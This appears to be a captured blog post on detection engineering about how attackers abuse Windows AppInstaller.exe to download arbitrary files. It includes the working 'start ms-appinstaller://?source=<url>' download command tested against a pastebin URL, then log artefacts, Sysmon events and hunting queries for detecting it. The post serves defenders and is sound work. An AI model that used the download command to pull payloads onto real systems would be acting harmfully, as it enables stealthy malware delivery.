detect.fyi Open in urlscan Pro
162.159.152.4  Public Scan

Submitted URL: https://www.bing.com/ck/a?!&&p=974473bc9f34c6a2JmltdHM9MTcwNDkzMTIwMCZpZ3VpZD0xZTRlNmQ2NS0xZTQyLTYzYmYtMGNkMi03ZTljMW...
Effective URL: https://detect.fyi/lolbas-detection-serie-1-appinstaller-exe-96971b9b1793?gi=515b3cbc3ee1
Submission: On January 12 via manual from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

Open in app

Sign up

Sign in

Write


Sign up

Sign in


Mastodon


LOLBAS DETECTION SERIE [1] - APPINSTALLER.EXE

mthcht

·

Follow

Published in

Detect FYI

·
6 min read
·
Aug 21, 2023

9



Listen

Share



The LOLBAS serie: https://mthcht.medium.com/list/lolbas-843ba9de6810


WHAT IS APPINSTALLER?

AppInstaller is an utility that allows the installation of APPX and MSIX
packages, leveraged by numerous software editors and playing a key role in
software management.


WHAT IS LOLBAS ?

Living Off The Land Binaries and Scripts

The goal of the LOLBAS project is to document every binary, script, and library
that can be used for Living Off The Land techniques.

Living Off The Land techniques refer to a set of tactics used by attackers to
exploit legitimate tools and processes already present on a system. By using
these built-in tools and features, they can carry out malicious activities
undetected by seamlessly blending in with legitimate traffic.

For the LOLBAS project a LOLBin/Lib/Script must:

 * Be a Microsoft-signed file, either native to the OS or downloaded from
   Microsoft.
 * Have extra “unexpected” functionality.
 * Have functionality that would be useful to an APT or red team


LOL TECHNIQUE FOR APPINSTALLER.EXE

Ref LOLBAS:https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

notwhickey on twitter found a way to download arbitrary files with
AppInstaller.exe by using the following command:
start ms-appinstaller://?source=<url>

Using ‘?source=<url>’, even if the targeted file is not recognized, it will
still be downloaded to the system!

Categorized: T1105: Ingress Tool Transfer


TESTING AND DETECTION

Important Note: I have tried with multiple versions of Windows, and it will not
work on an updated system. This is because the ms-appinstaller protocol has been
disabled by Microsoft since it was abused by malware, with Emotet being one of
them:
https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/

I tested it on this Windows 10 Build version and it worked for me:



Let’s test the command suggested on the LOLBAS page:

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

This is the message showed by Appinstaller after execution (Invalid file
format):




WHAT IS HAPPENING BEHIND THE SCENE ?

with procmon running in the background, we can see these file creations:



Both AppInstaller.exe and taskhostw.exe created text files named after our file
in the Pastebin URL, ‘tdyShwLw[1].txt’, in the directory
‘C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\InetCache\<RANDOM-8-CHAR-DIRECTORY>’.
This behavior is consistent with what’s suggested on the LOLBAS page.

Additionally, an interesting file named ‘AILog.txt’ is created by
AppInstaller.exe in
C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\

 * Content of tdyShwLw[1].txt:



We find the string calc.exe in our text file, which corresponds to the content
of the Pastebin link we attempted to download
(https://pastebin.com/raw/tdyShwLw). Thus, even if the system doesn’t recognize
the targeted file as a valid format, it will still download it to the system !

 * Content of AILog.txt
   (C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt):

[Mon Aug 21 17:17:25 2023] Log File is located under: C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835277824]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835343360]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890000384]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890065920]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931222528]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931288064]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814751004164096]
[Mon Aug 21 17:17:25 2023]{6064} App::OnActivated: Activated via other means (protocol/protocol for results/toast notification)
[Mon Aug 21 17:17:25 2023]{6064} Activated with Protocol contract.
[Mon Aug 21 17:17:25 2023]{6064} Argument is a Uri: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:25 2023]{6064} Setting launch intent to MSAPPINSTALLER_INSTALL
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Toast Notification Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Toast Notification Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Installation Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Installation Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} GoToState -> WindowButtonsPresentState
[Mon Aug 21 17:17:25 2023]{6064} GoToState -> LoadingState
[Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXExtensionSupported -> True
[Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXBundleExtensionSupported -> True
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:25 2023]{6064} AppsInfo->CreateAsync, URI: [https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} AppsInfo, File Type: [Package]
[Mon Aug 21 17:17:25 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating package info
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f]
[Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [Bundle]
[Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating bundle info
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f]
[Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [AppInstaller]
[Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:26 2023]{6064} AppInstaller XML content:
calc.exe
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerExtension::LoadXmlFromSourceAsync -> Error: 0xc00ce556
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x80073aa0]
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerException -> Error Resource ID: [invalidFile]
[Mon Aug 21 17:17:26 2023]{6064} GoToState -> LoadedState
[Mon Aug 21 17:17:26 2023]{6064} GoToState -> DisplayAppsInfoErrorState

This is a nice DFIR artefact that can be collected to detect the usage of this
lolbin, the full url argument is indicated in this log
https://pastebin.com/raw/tdyShwLw !

With Sysmon EventID 22 i can see Appinstaller.exe making a DNS request to
pastebin.com:

Log Name:      Microsoft-Windows-Sysmon/Operational
Source:        Microsoft-Windows-Sysmon
Date:          8/21/2023 5:17:25 PM
Event ID:      22
Task Category: Dns query (rule: DnsQuery)
Level:         Information
Keywords:      
User:          Système
Computer:      DESKTOP-GI9JDDB
Description:
Dns query:
RuleName: 
UtcTime: 2023-08-21 17:17:25.056
ProcessGuid: {ba956c93-8574-64e3-0000-00105a40cb00}
ProcessId: 5276
QueryName: pastebin.com
QueryStatus: 0
QueryResults: ::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170;
Image: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
    <EventID>22</EventID>
    <Version>5</Version>
    <Level>4</Level>
    <Task>22</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <TimeCreated SystemTime="2023-08-21T17:17:25.008082800Z" />
    <EventRecordID>1478857</EventRecordID>
    <Correlation />
    <Execution ProcessID="2684" ThreadID="3788" />
    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
    <Computer>DESKTOP-GI9JDDB</Computer>
    <Security UserID="S-1-5-18" />
  </System>
  <EventData>
    <Data Name="RuleName">
    </Data>
    <Data Name="UtcTime">2023-08-21 17:17:25.056</Data>
    <Data Name="ProcessGuid">{ba956c93-8574-64e3-0000-00105a40cb00}</Data>
    <Data Name="ProcessId">5276</Data>
    <Data Name="QueryName">pastebin.com</Data>
    <Data Name="QueryStatus">0</Data>
    <Data Name="QueryResults">::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170;</Data>
    <Data Name="Image">C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe</Data>
  </EventData>
</Event>

what is unexpected is that i cannot see the command line in process execution
logs (EventID 1,3,4688…):

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

I am not sure why it’s not logged, it seems to be a specific behavior for
protocol handlers…

But Since the ms-appinstaller protocol has been disabled by Microsoft 2 years
ago, for the detection we can rely on the sigma detection proposed in the LOLBAS
project: Appinstaller.exe making a DNS query and to get the full url requested
we should see the url in our proxy logs (or by collecting the log file
*:\Users\*\AppData\Local\Packages\Microsoft.DesktopAppInstaller_*\TempState\AILog.txt
on the endpoints !

For this example using pastebin for data collection, i recommand these
detections patterns for pastebin requests in your proxy logs (ref):

Raw content access with pastebin in the field url:

 * http*//pastebin.com*/raw/*
 * http*//pastebin.com*/rw/*

More details on pastebin detections:
https://detect.fyi/how-threat-actors-use-pastebin-69a78c149ccf


RELEVANT HUNTING SEARCHES:

DNS Queries (to correlate with the logs from AILog.txt)

`mysysmonlogs` 
  process_path="C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_*\\AppInstaller.exe"
  signature_id=22

Now for the commandline (even if i did not see it) it could be in a script or
combined with other commands and logged in process execution:

(`scriptcontentblocklogs` OR (`mysysmonlogs` signature_id=1))
  process_command="*start ms-appinstaller://?source=http*" 
  OR scriptcontent="*start ms-appinstaller://?source=http*"

Lookup Table entries:



(change with your own field mapping)

Moving on to the next LOLBAS !





SIGN UP TO DISCOVER HUMAN STORIES THAT DEEPEN YOUR UNDERSTANDING OF THE WORLD.


FREE



Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.


Sign up for free


MEMBERSHIP



Access the best member-only stories.

Support independent authors.

Listen to audio narrations.

Read offline.

Join the Partner Program and earn for your writing.


Try for $5/month
Threat Hunting
Detection Engineering
Cybersecurity
Lolbin
Appinstaller


9

9



Follow




WRITTEN BY MTHCHT

331 Followers
·Writer for

Detect FYI

Threat Hunting - DFIR - Detection Engineering https://twitter.com/mthcht

Follow





MORE FROM MTHCHT AND DETECT FYI

mthcht

in

Detect FYI


THREAT HUNTING - SUSPICIOUS USER AGENTS


HUNTING FOR SUSPICIOUS USER AGENTS WITH SPLUNK

14 min read·Jan 1

76





mthcht

in

Detect FYI


THREAT HUNTING — SUSPICIOUS WINDOWS SERVICE NAMES


SIMULATION AND DETECTION

13 min read·3 days ago

38





Simone Kraus

in

Detect FYI


RHYSIDA RANSOMWARE AND THE DETECTION OPPORTUNITIES


ROBUST DETECTION AND ANALYTICAL SCORING COUNTERING CY-X THREAT ACTOR LIKE
RYHSIDA

12 min read·Dec 10, 2023

75

1




mthcht

in

Detect FYI


DETECTING DNS OVER HTTPS


DETECTING DNS OVER HTTPS - DOH WITH A SIEM - LOGS ANALYSIS

8 min read·Nov 7, 2023

77

1



See all from mthcht
See all from Detect FYI



RECOMMENDED FROM MEDIUM

mthcht

in

Detect FYI


DETECTING PSEXEC AND SIMILAR TOOLS


DETECT PSEXEC

5 min read·Aug 7, 2023

77





Simone Kraus

in

OSINT TEAM


BIG GAME HUNTING — VIDAR SERVER INFRASTRUCTURE IN GERMANY


SCATTERED SPIDER AND SVR?

5 min read·Dec 17, 2023

55






LISTS


NATURAL LANGUAGE PROCESSING

1081 stories·556 saves


MITRE Caldera


MITRE CALDERA™ NAIVE BAYES PLANNER


AUTHORS: KIRILL USUBYAN, MICHAEL KOUREMETIS & CHRIS JELLEN

6 min read·Oct 3, 2023

52





Ron Kaminsky


GEOLOCATING PICTURES VIA OSINT & AI


A DEEP DIVE INTO THE CAPABILITIES OF AI IN OSINT INVESTIGATIONS

6 min read·Jan 3

77





Nived Sawant


INCIDENT RESPONSE ON LINUX — LOOKING INTO RIGHT PLACES.


INTRODUCTION:

5 min read·Jan 4

13





Angelo Pio Amirante


MALWARE DEVELOPMENT: HOW TO STORE A PAYLOAD IN DIFFERENT SECTIONS OF A PE FILE


THIS ARTICLE WILL SHOW HOW TO STORE A MALICIOUS PAYLOAD IN DIFFERENT SECTIONS OF
A PE FILE. THIS ARTICLE IS PART OF A SERIES, IF YOU…

3 min read·Jul 23, 2023

62




See more recommendations

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams

To make Medium work, we log user data. By using Medium, you agree to our Privacy
Policy, including cookie policy.